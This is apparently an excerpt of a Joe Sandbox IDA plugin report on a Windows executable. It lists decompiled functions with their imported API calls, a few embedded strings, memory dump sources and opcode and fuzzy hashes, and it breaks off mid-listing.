Instruction ID: 3e548fea8a48d6e4baf1967c56f6009affb6668b802cef17f03d357d3dd53d23
Opcode Fuzzy Hash: 66f70a2130dd12123222d8d70e99f143ef02b8dd501f163f7f5f328fcc77e5c4
Instruction Fuzzy Hash: 0E61AF62B14B42AAEB04EF65E5803BC63A2FB48F88F804531DE5D17B99DF38D551D390

Function 00007FF735DBE9B0 Relevance: 8.8, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF735DBEB20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF735DBE9D0), ref: 00007FF735DBEB76
Part of subcall function 00007FF735DBEB20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF735DBE9D0), ref: 00007FF735DBEC19
Part of subcall function 00007FF735DBEB20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF735DBE9D0), ref: 00007FF735DBEC42

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBE9EB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBEA0C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBEA59
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBEA89
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBEAAE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBEAD3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBEAF4

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c5a116ecbc7fcd4e730fcb505c56cfab96722ebf421517b132b46b27566b64a1
Instruction ID: 350f3eea673a1b678999018055b21d96b92aa49d9dcb616a5e06cc356a683eed
Opcode Fuzzy Hash: c5a116ecbc7fcd4e730fcb505c56cfab96722ebf421517b132b46b27566b64a1
Instruction Fuzzy Hash: 5B412732A2AB43A6EE59AF55E490238B7A5FF44F40F895035CE4D47354EF3DE841A3A0

Function 00007FF735DA12A0 Relevance: 8.8, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF735DBBA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBA31
Part of subcall function 00007FF735DBBA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBA5A
Part of subcall function 00007FF735DBBA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBA83
Part of subcall function 00007FF735DBBA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBAB8
Part of subcall function 00007FF735DBBA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBAE1
Part of subcall function 00007FF735DBBA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBB10
Part of subcall function 00007FF735DBBA00: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBBB94

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA12CD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA12F2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA1314
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA1336
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA1358
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA137A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA139C

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 87b8cf33815b13a2c5041e91584307a4fa0fed80dc9b28761f4af4000df7e558
Instruction ID: 4e0849cf3b7446d051e2b1b0eba98d1318fabbb1bb3fb894bfa8c45b143d5b02
Opcode Fuzzy Hash: 87b8cf33815b13a2c5041e91584307a4fa0fed80dc9b28761f4af4000df7e558
Instruction Fuzzy Hash: 95312821B2F683A5FE9AAFA1D490639A3A0EF45F40F885035C90D477A1DF2CE941A370

Function 00007FF735DA1450 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 350COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF735DA2050: memset.VCRUNTIME140(?,?,?,00007FF735DA1489), ref: 00007FF735DA213F

memset.VCRUNTIME140 ref: 00007FF735DA18E4

Part of subcall function 00007FF735DC10C0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DC10F0
Part of subcall function 00007FF735DC10C0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DC1119
Part of subcall function 00007FF735DC10C0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DC1142

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA19C0
memset.VCRUNTIME140 ref: 00007FF735DA1C7C
memset.VCRUNTIME140 ref: 00007FF735DA1CAC

Strings

##Overlay, xrefs: 00007FF735DA1B99

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memset$free$malloc
String ID: ##Overlay
API String ID: 1393892039-3248624929
Opcode ID: 1f0c51854f2e397330435cefd1d00fe77ff43c718336296e58be221f38198356
Instruction ID: 6f2df0cf5dbef8e5c199296bc5feff05e2b3c81779bcf5369822e53819e4d97e
Opcode Fuzzy Hash: 1f0c51854f2e397330435cefd1d00fe77ff43c718336296e58be221f38198356
Instruction Fuzzy Hash: F622E272505BC189D310DF29E8445D877A8F745F68FAC433AEAA40B398DF74A1A1C768

Function 00007FF735DB3950 Relevance: 7.6, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB398B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB39CF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3A0B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3A30
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3A55
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3A7E

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 61aa60da59db7c650cb9f0918b368bae93579de1a9ec62b6489cefe82620e32f
Instruction ID: 026b999e7f7f01cf0c6b40bc5ec6022b0c4104f4928dc4e9c0b665201abbfbb3
Opcode Fuzzy Hash: 61aa60da59db7c650cb9f0918b368bae93579de1a9ec62b6489cefe82620e32f
Instruction Fuzzy Hash: 83314832A2A683B6FF95AF51D490278A3A1FF84F40F885435C94E477A4DF3CE541A720

Function 00007FF735DE74F0 Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF735DE752B
??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF735DE754A
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF735DE757C
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF735DE7597
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF735DE75E3

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@
String ID:
API String ID: 1830095303-0
Opcode ID: 32febbce372a9926f610f8dd6ac977c5ec191ea6a007aa2f0d8974d3562481d5
Instruction ID: dd07108957719ab4d65549446480a0ccd726c971338c55da3eec7ec8d0f41bea
Opcode Fuzzy Hash: 32febbce372a9926f610f8dd6ac977c5ec191ea6a007aa2f0d8974d3562481d5
Instruction Fuzzy Hash: D6317632615B8291EB14DF2AEA9432DB7A0FB89F89F448131CA8D47724CF39C166D740

Function 00007FF735DE6780 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF735DE67B3
??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF735DE67D2
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF735DE6804
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF735DE681F

Part of subcall function 00007FF735DE7CF0: ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF735DE7D2A
Part of subcall function 00007FF735DE7CF0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF735DE7D47
Part of subcall function 00007FF735DE7CF0: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DE7D70
Part of subcall function 00007FF735DE7CF0: ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF735DE7DBB
Part of subcall function 00007FF735DE7CF0: ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF735DE7DD0

?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF735DE686B

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Fiopen@std@@U_iobuf@@V?$basic_streambuf@Vlocale@2@_get_stream_buffer_pointers
String ID:
API String ID: 2682282330-0
Opcode ID: f33a761491909d7b4dbe81a338dc14efbaa838da8a8269b000a42f2c3f335eae
Instruction ID: 7d96a9bc68817edcbcfc0551e29d29beba17dd2dedb7b65b02020db10f7ddca9
Opcode Fuzzy Hash: f33a761491909d7b4dbe81a338dc14efbaa838da8a8269b000a42f2c3f335eae
Instruction Fuzzy Hash: 7E218C32618B8296EB14DF25F89432AB7A4FB49F89F848135DA8D87B28CF3DD105C750

Function 00007FF735DD2530 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF735DE8040: DeviceIoControl.KERNEL32 ref: 00007FF735DE80F9

Part of subcall function 00007FF735DE8140: DeviceIoControl.KERNEL32 ref: 00007FF735DE81F9

DeviceIoControl.KERNEL32 ref: 00007FF735DD262E
DeviceIoControl.KERNEL32 ref: 00007FF735DD26B0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD2769

Strings

NPC, xrefs: 00007FF735DD278B

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: ControlDevice$_invalid_parameter_noinfo_noreturn
String ID: NPC
API String ID: 2054765191-3492492454
Opcode ID: bcaba0927105816e3e999f3c7db0e4978fc75d252b1958c3a3439da8e2f212f2
Instruction ID: 32b2c0cb8f1a093d82c710862aba70d4819fba377c9793cf72bdb9dc2d5cc0cb
Opcode Fuzzy Hash: bcaba0927105816e3e999f3c7db0e4978fc75d252b1958c3a3439da8e2f212f2
Instruction Fuzzy Hash: DB61CB73B19782AAEB14DF64E4803AD73E0EB44B98F808635EE5D07B98CF38D6559350

Function 00007FF735DD6C50 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF735DD6CC5

Part of subcall function 00007FF735DEB9D8: MultiByteToWideChar.KERNEL32 ref: 00007FF735DEB9F4
Part of subcall function 00007FF735DEB9D8: GetLastError.KERNEL32 ref: 00007FF735DEBA02

__std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF735DD6D71

Part of subcall function 00007FF735DE93C0: memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF735DD7251), ref: 00007FF735DE94C3

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD6E1B

Strings

Unknown exception, xrefs: 00007FF735DD7087

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: __std_fs_convert_narrow_to_wide$ByteCharErrorLastMultiWide_invalid_parameter_noinfo_noreturnmemmove
String ID: Unknown exception
API String ID: 258765704-410509341
Opcode ID: 8170960e2da90011fc7bdb144ee5cb6efa36b9f96b4b95913af18e5dfb15874b
Instruction ID: bfb1b6baab2727c92e938a69154a1d1983d888aab5bf74d57b40595eaa6c3fd5
Opcode Fuzzy Hash: 8170960e2da90011fc7bdb144ee5cb6efa36b9f96b4b95913af18e5dfb15874b
Instruction Fuzzy Hash: 8F4102A2A28796A1EB18AF66E48476CA390EF44FC8F944031DE4D07744DF3CE491D380

Function 00007FF735DDA4E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FF735DDA5CA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DDA605

Strings

Press Key, xrefs: 00007FF735DDA56F
Select Key, xrefs: 00007FF735DDA53A

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: CreateThread_invalid_parameter_noinfo_noreturn
String ID: Press Key$Select Key
API String ID: 2430190256-2074042277
Opcode ID: 499aa2a7c659b6a84dd94e367b045d99161d7b41431c0e4b921a0de9bc7ab3c0
Instruction ID: ad5f8e649d89f211b8dee07e1a2b7060573b2e108e5aa5163061c7a9b52ef6f8
Opcode Fuzzy Hash: 499aa2a7c659b6a84dd94e367b045d99161d7b41431c0e4b921a0de9bc7ab3c0
Instruction Fuzzy Hash: C231D772A286C391EB54EB18E4C037AE751EF81FE0F909235EE5E06AD9DF2CD4849710

Function 00007FF735DB2E10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

ImmGetContext.IMM32 ref: 00007FF735DB2E49
ImmSetCompositionWindow.IMM32 ref: 00007FF735DB2E6F
ImmReleaseContext.IMM32 ref: 00007FF735DB2E7B

Strings

, xrefs: 00007FF735DB2E67

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: Context$CompositionReleaseWindow
String ID:
API String ID: 244372355-3916222277
Opcode ID: e1277b29f0780cca18283900559f5205b95fb5625325ea21f4a6762f94f4308b
Instruction ID: 0528476c7d13f73787efe029d9ca4b37f2ce4d948b1826ecbf77efb2ebe83c42
Opcode Fuzzy Hash: e1277b29f0780cca18283900559f5205b95fb5625325ea21f4a6762f94f4308b
Instruction Fuzzy Hash: 88018436A18B4292EA25AF16F554269F3A1FB8CFD4F840135DE8C47715EF3CE4449B20

Function 00007FF735DAB87E Relevance: 6.5, APIs: 1, Strings: 3, Instructions: 474COMMON

Download Yara Rule

Strings

#COLLAPSE, xrefs: 00007FF735DABC95
#CLOSE, xrefs: 00007FF735DABCFC
%.*s, xrefs: 00007FF735DAC12E

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: freemallocmemmove
String ID: %.*s$#CLOSE$#COLLAPSE
API String ID: 2537350866-830562872
Opcode ID: b1209a498c370f522969e5e8d79b3fa9658dcc679ffb50dd430fcc853a4a17b8
Instruction ID: 0d287e5fc7e8eca64faef39a9d3104402ffe89f8bb552d0e3485f61e8b692ca4
Opcode Fuzzy Hash: b1209a498c370f522969e5e8d79b3fa9658dcc679ffb50dd430fcc853a4a17b8
Instruction Fuzzy Hash: 77321632B28682ABE709DB36C5802E9B7A0FF59B54F448735DB18572A1DF38F461DB10

Function 00007FF735DB2210 Relevance: 6.3, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB2292
memmove.VCRUNTIME140 ref: 00007FF735DB22B5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB22D8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB235C
memmove.VCRUNTIME140 ref: 00007FF735DB236C

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: mallocmemmove$free
String ID:
API String ID: 4023028716-0
Opcode ID: 0cb17226824ab7b0607adb79a8304e4d00a1ea62160d775fd7a1e4c91e7eed0a
Instruction ID: 5b620ce9c2d4110366aafc3be2c54f33a70477c610ee50f31194c0c99efa6b85
Opcode Fuzzy Hash: 0cb17226824ab7b0607adb79a8304e4d00a1ea62160d775fd7a1e4c91e7eed0a
Instruction Fuzzy Hash: 5641C032A19BC396EB549F25A4801B8B3A1FB88F84F584236DE5D87799DF3CE441D720

Function 00007FF735DCDEF0 Relevance: 6.3, APIs: 4, Instructions: 345COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCE066
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCE084
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCE3AB
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCE40D

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 86c057f93ea16fe2871d44cefd3ec9c2ac7bb55b00e45b83bd5f4eff3c984cd3
Instruction ID: f0c7f6b3ff83930ef4b66400848906f21d8056c6b3f3259884dff8e8c6057009
Opcode Fuzzy Hash: 86c057f93ea16fe2871d44cefd3ec9c2ac7bb55b00e45b83bd5f4eff3c984cd3
Instruction Fuzzy Hash: 60E13B33D287CE95E213AB3794811B9F390EF6EB84F4C8732ED88761A1DF2975819650

Function 00007FF735DCF7B0 Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

APIs

